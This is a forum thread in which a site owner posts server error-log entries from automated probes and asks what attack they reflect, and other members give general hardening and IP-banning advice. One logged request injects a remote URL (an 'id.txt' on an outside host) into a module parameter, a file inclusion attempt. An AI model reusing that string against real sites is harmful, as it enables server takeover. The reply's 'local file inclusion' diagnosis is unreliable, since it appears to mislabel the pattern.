Scary entries in server log

chasq

Space Explorer

Offline

Posts: 8

Scary entries in server log

« on: January 05, 2008, 06:55:41 AM »

I am having problems with some pictures on my site. So I checked the ERROR LOG and found these entries:

[Sat Jan 5 03:52:53 2008] [error] [client 80.97.20.22] File does not exist: /home/oceans52/public_html//phpsecurityadmin/include/logout.php [Sat Jan 5 03:51:35 2008] [error] [client 80.97.20.22] script not found or unable to stat: /home/oceans52/public_html//includes/tumbnail.php [Sat Jan 5 03:49:02 2008] [error] [client 80.97.20.22] File does not exist: /home/oceans52/public_html//modules/fs/mod&pwd=casualpass&mod_root=http://trimedia-online.net/ihmank/id.txt [Sat Jan 5 03:39:36 2008] [error] [client 219.94.145.104] script not found or unable to stat: /home/oceans52/public_html//includes/tumbnail.php [Sat Jan 5 03:39:25 2008] [error] [client 219.94.145.104] File does not exist: /home/oceans52/public_html//phpsecurityadmin/include/logout.php [Sat Jan 5 03:39:08 2008] [error] [client 219.94.145.104] File does not exist: /home/oceans52/public_html//modules/fs/mod&pwd=casualpass&mod_root=http://trimedia-online.net/ihmank/id.txt [Sat Jan 5 01:51:46 2008] [error] [client 80.97.20.22] File does not exist: /home/oceans52/public_html//common/db.php

I googled ihmank/id.txt and found out that someone is trying to hack my site. Does anyone know what kind of attack my site is being subjected to? The blog I visited is at => http://websecurity.ro/blog/?s=ihmank%2Fid.txt

Chasq


	Logged

white_hacker

Trekkie

Offline

Posts: 11

Re: Scary entries in server log

« Reply #1 on: January 15, 2008, 08:13:20 PM »

Off the top of my head, the errors may be link to a "local file inclusion" vulnerability attack. By accessing secret, hidden or misc files. Attackers can obtain information that shouldn't be disclosed. Since common way such as logs are typically harder to get at. Files such as specially prepared JPG's can be used too. Once open attackers can upload all the code they want. Of course without looking into it further, I may be wrong about what attack it is. But you mentioned having trouble with pictures. Graphics are commonly used in LFI. There are a few different methods to exploit this weaken. There's no indication from the entries anything was successful. It could have just been an automated bot scanning for sites with vulnerabilities. I would keep an eye on the logs to see if similar odd entries show up. If you really wanted to you could make sure all scripts are up to date, double check folder/file permissions, upload fresh copies of the pictures or have issues with. If you look up: local file inclusion , you can get a lot more info.


	Logged

Toon_Dawg

Spaceship Navigator

Offline

Posts: 93

Re: Scary entries in server log

« Reply #2 on: February 07, 2008, 02:24:26 PM »

I get random attacks as well. I believe what a lot of hackers do is get a list of active domain names and attempt to hit them by trying out scripts that are used on common installed scripts. For example, I see attempts in my server log trying to hack into a board directory off of my main domain, and I've never had one there. It's kind of like spammers just sending out millions of spam to random hotmail addresses that may or may not be valid addresses. They will hit some just out of luck.

It may or may not help, but I ban the offending IP addresses through cpanel in case they attempt to come back.


	Logged

http://www.dawgtoons.com/

chasq

Space Explorer

Offline

Posts: 8

Re: Scary entries in server log

« Reply #3 on: March 01, 2008, 06:51:11 AM »

That's a good idea about banning the IP addresses. How big is your list?


	Logged

Pages: [1] Go Up

« previous next »

	Welcome, Guest. Please login or register. Did you miss your activation email?	July 24, 2008, 07:15:39 AM
		Login with username, password and session length